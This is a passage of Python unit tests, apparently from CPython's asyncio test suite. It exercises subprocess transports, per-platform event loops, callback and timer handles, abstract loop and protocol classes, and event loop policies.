        self.check_killed(proto.returncode)

    def test_subprocess_shell(self):
        """subprocess_shell() runs a shell command and captures stdout."""
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'echo Python')
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.get_pipe_transport(0).close()
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(0, proto.returncode)
        self.assertTrue(all(f.done() for f in proto.disconnects.values()))
        self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
        self.assertEqual(proto.data[2], b'')
        transp.close()

    def test_subprocess_exitcode(self):
        """The child's exit status is reported as the protocol returncode."""
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        transp.close()

    def test_subprocess_close_after_finish(self):
        """close() after the child already exited returns None and the
        std pipes (disabled via stdin/stdout/stderr=None) are absent."""
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.assertIsNone(transp.get_pipe_transport(0))
        self.assertIsNone(transp.get_pipe_transport(1))
        self.assertIsNone(transp.get_pipe_transport(2))
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        self.assertIsNone(transp.close())

    def test_subprocess_kill(self):
        """transport.kill() ends the child with SIGKILL semantics."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.kill()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)
        transp.close()

    def test_subprocess_terminate(self):
        """transport.terminate() ends the child with SIGTERM semantics."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.terminate()
        self.loop.run_until_complete(proto.completed)
        self.check_terminated(proto.returncode)
        transp.close()

    @unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
    def test_subprocess_send_signal(self):
        """transport.send_signal(SIGHUP) kills a child with the default
        SIGHUP disposition."""
        # bpo-31034: Make sure that we get the default signal handler (killing
        # the process). The parent process may have decided to ignore SIGHUP,
        # and signal handlers are inherited.
        old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
        try:
            prog = os.path.join(os.path.dirname(__file__), 'echo.py')

            connect = self.loop.subprocess_exec(
                functools.partial(MySubprocessProtocol, self.loop),
                sys.executable, prog)
            transp, proto = self.loop.run_until_complete(connect)
            self.assertIsInstance(proto, MySubprocessProtocol)
            self.loop.run_until_complete(proto.connected)

            transp.send_signal(signal.SIGHUP)
            self.loop.run_until_complete(proto.completed)
            self.assertEqual(-signal.SIGHUP, proto.returncode)
            transp.close()
        finally:
            signal.signal(signal.SIGHUP, old_handler)

    def test_subprocess_stderr(self):
        """stdout and stderr of the child are captured on fds 1 and 2."""
        prog = os.path.join(os.path.dirname(__file__), 'echo2.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'test')

        self.loop.run_until_complete(proto.completed)

        transp.close()
        self.assertEqual(b'OUT:test', proto.data[1])
        self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
        self.assertEqual(0, proto.returncode)

    def test_subprocess_stderr_redirect_to_stdout(self):
        """With stderr=subprocess.STDOUT there is no fd 2 pipe and stderr
        output is interleaved into fd 1."""
        prog = os.path.join(os.path.dirname(__file__), 'echo2.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog, stderr=subprocess.STDOUT)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        self.assertIsNotNone(transp.get_pipe_transport(1))
        self.assertIsNone(transp.get_pipe_transport(2))

        stdin.write(b'test')
        self.loop.run_until_complete(proto.completed)
        self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
                        proto.data[1])
        self.assertEqual(b'', proto.data[2])

        transp.close()
        self.assertEqual(0, proto.returncode)

    def test_subprocess_close_client_stream(self):
        """Closing our read end of the child's stdout makes the child's
        next write fail with a broken pipe (reported on its stderr)."""
        prog = os.path.join(os.path.dirname(__file__), 'echo3.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        stdout = transp.get_pipe_transport(1)
        stdin.write(b'test')
        self.loop.run_until_complete(proto.got_data[1].wait())
        self.assertEqual(b'OUT:test', proto.data[1])

        stdout.close()
        self.loop.run_until_complete(proto.disconnects[1])
        stdin.write(b'xxx')
        self.loop.run_until_complete(proto.got_data[2].wait())
        if sys.platform != 'win32':
            self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
        else:
            # After closing the read-end of a pipe, writing to the
            # write-end using os.write() fails with errno==EINVAL and
            # GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
            # WriteFile() we get ERROR_BROKEN_PIPE as expected.)
            self.assertEqual(b'ERR:OSError', proto.data[2])
        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)

    def test_subprocess_wait_no_same_group(self):
        """A child started in a new session is still waited on correctly."""
        # start the new process in a new session
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None,
            start_new_session=True)
        # BUG FIX: this line used to read ``_, proto = yield self.loop...``.
        # The stray ``yield`` turned this test method into a generator
        # function, so unittest got back an un-iterated generator and the
        # test body never ran (it silently "passed").
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        transp.close()

    def test_subprocess_exec_invalid_args(self):
        """subprocess_exec() rejects Popen options asyncio manages itself."""
        async def connect(**kwds):
            await self.loop.subprocess_exec(
                asyncio.SubprocessProtocol,
                'pwd', **kwds)

        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(universal_newlines=True))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(bufsize=4096))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(shell=True))

    def test_subprocess_shell_invalid_args(self):
        """subprocess_shell() rejects list commands and managed options."""
        async def connect(cmd=None, **kwds):
            if not cmd:
                cmd = 'pwd'
            await self.loop.subprocess_shell(
                asyncio.SubprocessProtocol,
                cmd, **kwds)

        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(['ls', '-l']))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(universal_newlines=True))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(bufsize=4096))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(shell=False))
# Instantiate the mixin test suites once per event-loop flavour available
# on this platform.
if sys.platform == 'win32':
    class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.SelectorEventLoop()

    class ProactorEventLoopTests(EventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.ProactorEventLoop()

        # IOCP has no add_reader()/add_writer(); skip fd-callback tests.
        def test_reader_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_reader_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_writer_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_writer_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_create_datagram_endpoint(self):
            raise unittest.SkipTest(
                "IocpEventLoop does not have create_datagram_endpoint()")

        def test_remove_fds_after_closing(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
    import selectors

    class UnixEventLoopTestsMixin(EventLoopTestsMixin):
        # every test loop needs a child watcher for subprocess support
        def setUp(self):
            super().setUp()
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

        def tearDown(self):
            asyncio.set_child_watcher(None)
            super().tearDown()

    if hasattr(selectors, 'KqueueSelector'):
        class KqueueEventLoopTests(UnixEventLoopTestsMixin,
                                   SubprocessTestsMixin,
                                   test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(
                    selectors.KqueueSelector())

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            # Issue #20667: KqueueEventLoopTests.test_read_pty_output()
            # hangs on OpenBSD 5.5
            @unittest.skipIf(sys.platform.startswith('openbsd'),
                             'test hangs on OpenBSD')
            def test_read_pty_output(self):
                super().test_read_pty_output()

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            def test_write_pty(self):
                super().test_write_pty()

    if hasattr(selectors, 'EpollSelector'):
        class EPollEventLoopTests(UnixEventLoopTestsMixin,
                                  SubprocessTestsMixin,
                                  test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.EpollSelector())

    if hasattr(selectors, 'PollSelector'):
        class PollEventLoopTests(UnixEventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.PollSelector())

    # Should always exist.
    class SelectEventLoopTests(UnixEventLoopTestsMixin,
                               SubprocessTestsMixin,
                               test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
    """Do nothing; accept and ignore any arguments (target for repr tests)."""
    return None
class HandleTests(test_utils.TestCase):
    """Tests for asyncio.Handle: construction, cancellation, repr and
    source-traceback capture.

    Note: test_handle_repr_debug and test_handle_source_traceback rely on
    exact line adjacency (sys._getframe().f_lineno arithmetic); do not
    insert lines between the marked pairs.
    """

    def setUp(self):
        super().setUp()
        self.loop = mock.Mock()
        self.loop.get_debug.return_value = True

    def test_handle(self):
        def callback(*args):
            return args
        args = ()
        h = asyncio.Handle(callback, args, self.loop)
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())
        h.cancel()
        self.assertTrue(h.cancelled())

    def test_callback_with_exception(self):
        # A raising callback must be routed to the loop's exception handler.
        def callback():
            raise ValueError()
        self.loop = mock.Mock()
        self.loop.call_exception_handler = mock.Mock()
        h = asyncio.Handle(callback, (), self.loop)
        h._run()
        self.loop.call_exception_handler.assert_called_with({
            'message': test_utils.MockPattern('Exception in callback.*'),
            'exception': mock.ANY,
            'handle': h,
            'source_traceback': h._source_traceback,
        })

    def test_handle_weakref(self):
        wd = weakref.WeakValueDictionary()
        h = asyncio.Handle(lambda: None, (), self.loop)
        wd['h'] = h  # Would fail without __weakref__ slot.

    def test_handle_repr(self):
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s>'
                         % (filename, lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<Handle cancelled>')

        # decorated function
        cb = asyncio.coroutine(noop)
        h = asyncio.Handle(cb, (), self.loop)
        self.assertEqual(repr(h),
                         '<Handle noop() at %s:%s>'
                         % (filename, lineno))

        # partial function
        cb = functools.partial(noop, 1, 2)
        h = asyncio.Handle(cb, (3,), self.loop)
        regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial function with keyword args
        cb = functools.partial(noop, x=1)
        h = asyncio.Handle(cb, (2, 3), self.loop)
        regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial method
        if sys.version_info >= (3, 4):
            method = HandleTests.test_handle_repr
            cb = functools.partialmethod(method)
            filename, lineno = test_utils.get_function_source(method)
            h = asyncio.Handle(cb, (), self.loop)
            cb_regex = r'<function HandleTests.test_handle_repr .*>'
            cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
            regex = (r'^<Handle %s at %s:%s>$'
                     % (cb_regex, re.escape(filename), lineno))
            self.assertRegex(repr(h), regex)

    def test_handle_repr_debug(self):
        self.loop.get_debug.return_value = True

        # simple function -- the Handle() call must stay on the line
        # immediately after the f_lineno capture.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

        # double cancellation won't overwrite _repr
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

    def test_handle_source_traceback(self):
        loop = asyncio.get_event_loop_policy().new_event_loop()
        loop.set_debug(True)
        self.set_event_loop(loop)

        def check_source_traceback(h):
            # Callers must place the scheduling call on the line directly
            # above the check_source_traceback() call.
            lineno = sys._getframe(1).f_lineno - 1
            self.assertIsInstance(h._source_traceback, list)
            self.assertEqual(h._source_traceback[-1][:3],
                             (__file__,
                              lineno,
                              'test_handle_source_traceback'))

        # call_soon
        h = loop.call_soon(noop)
        check_source_traceback(h)

        # call_soon_threadsafe
        h = loop.call_soon_threadsafe(noop)
        check_source_traceback(h)

        # call_later
        h = loop.call_later(0, noop)
        check_source_traceback(h)

        # call_at -- was a copy/paste of the call_later line and never
        # actually exercised loop.call_at(); fixed to schedule via call_at.
        h = loop.call_at(loop.time(), noop)
        check_source_traceback(h)

    @unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
                         'No collections.abc.Coroutine')
    def test_coroutine_like_object_debug_formatting(self):
        # Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_core or gi_code attributes
        # (such as ones compiled with Cython).
        coro = CoroLike()
        coro.__name__ = 'AAA'
        self.assertTrue(asyncio.iscoroutine(coro))
        self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')

        coro.__qualname__ = 'BBB'
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')

        coro.cr_running = True
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')

        coro = CoroLike()
        # Some coroutines might not have '__name__', such as
        # built-in async_gen.asend().
        self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
class TimerTests(unittest.TestCase):
    """Tests for asyncio.TimerHandle: hashing, cancellation, repr, ordering."""

    def setUp(self):
        super().setUp()
        self.loop = mock.Mock()

    def test_hash(self):
        # A timer handle hashes by its scheduled time.
        when = time.monotonic()
        h = asyncio.TimerHandle(when, lambda: False, (),
                                mock.Mock())
        self.assertEqual(hash(h), hash(when))

    def test_timer(self):
        def callback(*args):
            return args
        args = (1, 2, 3)
        when = time.monotonic()
        h = asyncio.TimerHandle(when, callback, args, mock.Mock())
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())

        # cancel
        h.cancel()
        self.assertTrue(h.cancelled())
        # Cancelling drops the references to the callback and its args.
        self.assertIsNone(h._callback)
        self.assertIsNone(h._args)

        # when cannot be None
        self.assertRaises(AssertionError,
                          asyncio.TimerHandle, None, callback, args,
                          self.loop)

    def test_timer_repr(self):
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        src = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() at %s:%s>' % src)

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123>')

    def test_timer_repr_debug(self):
        self.loop.get_debug.return_value = True

        # simple function -- the TimerHandle() call must stay on the line
        # immediately after the f_lineno capture.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

    def test_timer_comparison(self):
        def callback(*args):
            return args

        when = time.monotonic()

        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when, callback, (), self.loop)
        # TODO: Use assertLess etc.
        self.assertFalse(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertTrue(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertFalse(h2 > h1)
        self.assertTrue(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertTrue(h1 == h2)
        self.assertFalse(h1 != h2)

        # Equal times no longer compare equal once one side is cancelled.
        h2.cancel()
        self.assertFalse(h1 == h2)

        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
        self.assertTrue(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertFalse(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertTrue(h2 > h1)
        self.assertFalse(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertFalse(h1 == h2)
        self.assertTrue(h1 != h2)

        # Comparison against a plain Handle is unsupported.
        h3 = asyncio.Handle(callback, (), self.loop)
        self.assertIs(NotImplemented, h1.__eq__(h3))
        self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
    """Every AbstractEventLoop method must raise NotImplementedError."""

    def test_not_implemented(self):
        f = mock.Mock()
        loop = asyncio.AbstractEventLoop()
        self.assertRaises(
            NotImplementedError, loop.run_forever)
        self.assertRaises(
            NotImplementedError, loop.run_until_complete, None)
        self.assertRaises(
            NotImplementedError, loop.stop)
        self.assertRaises(
            NotImplementedError, loop.is_running)
        self.assertRaises(
            NotImplementedError, loop.is_closed)
        self.assertRaises(
            NotImplementedError, loop.close)
        self.assertRaises(
            NotImplementedError, loop.create_task, None)
        self.assertRaises(
            NotImplementedError, loop.call_later, None, None)
        self.assertRaises(
            NotImplementedError, loop.call_at, f, f)
        self.assertRaises(
            NotImplementedError, loop.call_soon, None)
        self.assertRaises(
            NotImplementedError, loop.time)
        self.assertRaises(
            NotImplementedError, loop.call_soon_threadsafe, None)
        self.assertRaises(
            NotImplementedError, loop.set_default_executor, f)
        self.assertRaises(
            NotImplementedError, loop.add_reader, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_reader, 1)
        self.assertRaises(
            NotImplementedError, loop.add_writer, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_writer, 1)
        self.assertRaises(
            NotImplementedError, loop.add_signal_handler, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_signal_handler, 1)
        # NOTE(review): remove_signal_handler is asserted twice -- looks
        # like a copy/paste duplicate; harmless, preserved as-is.
        self.assertRaises(
            NotImplementedError, loop.remove_signal_handler, 1)
        self.assertRaises(
            NotImplementedError, loop.set_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.default_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.call_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.get_debug)
        self.assertRaises(
            NotImplementedError, loop.set_debug, f)

    def test_not_implemented_async(self):
        # Coroutine methods only raise once awaited, so they are driven
        # by a real (concrete) event loop.

        async def inner():
            f = mock.Mock()
            loop = asyncio.AbstractEventLoop()

            with self.assertRaises(NotImplementedError):
                await loop.run_in_executor(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.getaddrinfo('localhost', 8080)
            with self.assertRaises(NotImplementedError):
                await loop.getnameinfo(('localhost', 8080))
            with self.assertRaises(NotImplementedError):
                await loop.create_connection(f)
            with self.assertRaises(NotImplementedError):
                await loop.create_server(f)
            with self.assertRaises(NotImplementedError):
                await loop.create_datagram_endpoint(f)
            with self.assertRaises(NotImplementedError):
                await loop.sock_recv(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_recv_into(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_sendall(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_connect(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.sock_accept(f)
            with self.assertRaises(NotImplementedError):
                await loop.connect_read_pipe(f, mock.sentinel.pipe)
            with self.assertRaises(NotImplementedError):
                await loop.connect_write_pipe(f, mock.sentinel.pipe)
            with self.assertRaises(NotImplementedError):
                await loop.subprocess_shell(f, mock.sentinel)
            with self.assertRaises(NotImplementedError):
                await loop.subprocess_exec(f)

        loop = asyncio.new_event_loop()
        loop.run_until_complete(inner())
        loop.close()
class ProtocolsAbsTests(unittest.TestCase):
    """The abstract protocol base classes must provide no-op callbacks."""

    def test_empty(self):
        probe = mock.Mock()

        # Streaming protocol: every callback is a do-nothing stub.
        stream_proto = asyncio.Protocol()
        self.assertIsNone(stream_proto.connection_made(probe))
        self.assertIsNone(stream_proto.connection_lost(probe))
        self.assertIsNone(stream_proto.data_received(probe))
        self.assertIsNone(stream_proto.eof_received())

        # Datagram protocol.
        datagram_proto = asyncio.DatagramProtocol()
        self.assertIsNone(datagram_proto.connection_made(probe))
        self.assertIsNone(datagram_proto.connection_lost(probe))
        self.assertIsNone(datagram_proto.error_received(probe))
        self.assertIsNone(datagram_proto.datagram_received(probe, probe))

        # Subprocess protocol.
        subprocess_proto = asyncio.SubprocessProtocol()
        self.assertIsNone(subprocess_proto.connection_made(probe))
        self.assertIsNone(subprocess_proto.connection_lost(probe))
        self.assertIsNone(subprocess_proto.pipe_data_received(1, probe))
        self.assertIsNone(subprocess_proto.pipe_connection_lost(1, probe))
        self.assertIsNone(subprocess_proto.process_exited())
class PolicyTests(unittest.TestCase):
    """Tests for the event loop policy machinery."""

    def test_event_loop_policy(self):
        # The abstract policy implements none of its API.
        policy = asyncio.AbstractEventLoopPolicy()
        self.assertRaises(NotImplementedError, policy.get_event_loop)
        self.assertRaises(NotImplementedError, policy.set_event_loop, object())
        self.assertRaises(NotImplementedError, policy.new_event_loop)
        self.assertRaises(NotImplementedError, policy.get_child_watcher)
        self.assertRaises(NotImplementedError, policy.set_child_watcher,
                          object())

    def test_get_event_loop(self):
        # The first get_event_loop() call creates and caches a loop.
        policy = asyncio.DefaultEventLoopPolicy()
        self.assertIsNone(policy._local._loop)

        loop = policy.get_event_loop()
        self.assertIsInstance(loop, asyncio.AbstractEventLoop)

        self.assertIs(policy._local._loop, loop)
        self.assertIs(loop, policy.get_event_loop())
        loop.close()

    def test_get_event_loop_calls_set_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()

        with mock.patch.object(
                policy, "set_event_loop",
                wraps=policy.set_event_loop) as m_set_event_loop:

            loop = policy.get_event_loop()

            # policy._local._loop must be set through .set_event_loop()
            # (the unix DefaultEventLoopPolicy needs this call to attach
            # the child watcher correctly)
            m_set_event_loop.assert_called_with(loop)

        loop.close()

    def test_get_event_loop_after_set_none(self):
        # Explicitly clearing the loop makes get_event_loop() fail.
        policy = asyncio.DefaultEventLoopPolicy()
        policy.set_event_loop(None)
        self.assertRaises(RuntimeError, policy.get_event_loop)

    @mock.patch('asyncio.events.threading.current_thread')
    def test_get_event_loop_thread(self, m_current_thread):
        # Non-main threads get no implicit event loop.

        def f():
            policy = asyncio.DefaultEventLoopPolicy()
            self.assertRaises(RuntimeError, policy.get_event_loop)

        th = threading.Thread(target=f)
        th.start()
        th.join()

    def test_new_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()

        loop = policy.new_event_loop()
        self.assertIsInstance(loop, asyncio.AbstractEventLoop)
        loop.close()

    def test_set_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()
        old_loop = policy.get_event_loop()

        # Only event loops (or None) may be installed.
        self.assertRaises(AssertionError, policy.set_event_loop, object())

        loop = policy.new_event_loop()
        policy.set_event_loop(loop)
        self.assertIs(loop, policy.get_event_loop())
        self.assertIsNot(old_loop, policy.get_event_loop())
        loop.close()
        old_loop.close()

    def test_get_event_loop_policy(self):
        # The global policy is a lazily-created singleton.
        policy = asyncio.get_event_loop_policy()
        self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
        self.assertIs(policy, asyncio.get_event_loop_policy())

    def test_set_event_loop_policy(self):
        self.assertRaises(
            AssertionError, asyncio.set_event_loop_policy, object())

        old_policy = asyncio.get_event_loop_policy()

        policy = asyncio.DefaultEventLoopPolicy()
        asyncio.set_event_loop_policy(policy)
        self.assertIs(policy, asyncio.get_event_loop_policy())
        self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
    """Shared tests for get_event_loop()/get_running_loop().

    Subclasses pick either the pure-Python or the C-accelerated
    implementations via the four *_impl class attributes, which setUp
    monkeypatches into both the ``events`` module and the top-level
    ``asyncio`` namespace for the duration of each test.
    """

    _get_running_loop_impl = None
    _set_running_loop_impl = None
    get_running_loop_impl = None
    get_event_loop_impl = None

    def setUp(self):
        # Save the currently-installed implementations so tearDown can
        # restore them.
        self._get_running_loop_saved = events._get_running_loop
        self._set_running_loop_saved = events._set_running_loop
        self.get_running_loop_saved = events.get_running_loop
        self.get_event_loop_saved = events.get_event_loop

        # Install the implementation under test in both namespaces.
        events._get_running_loop = type(self)._get_running_loop_impl
        events._set_running_loop = type(self)._set_running_loop_impl
        events.get_running_loop = type(self).get_running_loop_impl
        events.get_event_loop = type(self).get_event_loop_impl

        asyncio._get_running_loop = type(self)._get_running_loop_impl
        asyncio._set_running_loop = type(self)._set_running_loop_impl
        asyncio.get_running_loop = type(self).get_running_loop_impl
        asyncio.get_event_loop = type(self).get_event_loop_impl

        super().setUp()

        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)

        if sys.platform != 'win32':
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

    def tearDown(self):
        try:
            if sys.platform != 'win32':
                asyncio.set_child_watcher(None)

            super().tearDown()
        finally:
            # Always restore the saved implementations, even if the base
            # tearDown fails.
            self.loop.close()
            asyncio.set_event_loop(None)

            events._get_running_loop = self._get_running_loop_saved
            events._set_running_loop = self._set_running_loop_saved
            events.get_running_loop = self.get_running_loop_saved
            events.get_event_loop = self.get_event_loop_saved

            asyncio._get_running_loop = self._get_running_loop_saved
            asyncio._set_running_loop = self._set_running_loop_saved
            asyncio.get_running_loop = self.get_running_loop_saved
            asyncio.get_event_loop = self.get_event_loop_saved

    if sys.platform != 'win32':

        def test_get_event_loop_new_process(self):
            # Issue bpo-32126: The multiprocessing module used by
            # ProcessPoolExecutor is not functional when the
            # multiprocessing.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')

            async def main():
                pool = concurrent.futures.ProcessPoolExecutor()
                result = await self.loop.run_in_executor(
                    pool, _test_get_event_loop_new_process__sub_proc)
                pool.shutdown()
                return result

            self.assertEqual(
                self.loop.run_until_complete(main()),
                'hello')

    def test_get_event_loop_returns_running_loop(self):
        class TestError(Exception):
            pass

        class Policy(asyncio.DefaultEventLoopPolicy):
            def get_event_loop(self):
                raise TestError

        old_policy = asyncio.get_event_loop_policy()
        try:
            asyncio.set_event_loop_policy(Policy())
            loop = asyncio.new_event_loop()

            with self.assertRaises(TestError):
                asyncio.get_event_loop()
            asyncio.set_event_loop(None)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

            with self.assertRaisesRegex(RuntimeError, 'no running'):
                self.assertIs(asyncio.get_running_loop(), None)
            self.assertIs(asyncio._get_running_loop(), None)

            async def func():
                # Inside a running loop get_event_loop() must return the
                # running loop and never consult the (raising) policy.
                self.assertIs(asyncio.get_event_loop(), loop)
                self.assertIs(asyncio.get_running_loop(), loop)
                self.assertIs(asyncio._get_running_loop(), loop)

            loop.run_until_complete(func())

            asyncio.set_event_loop(loop)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

            asyncio.set_event_loop(None)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

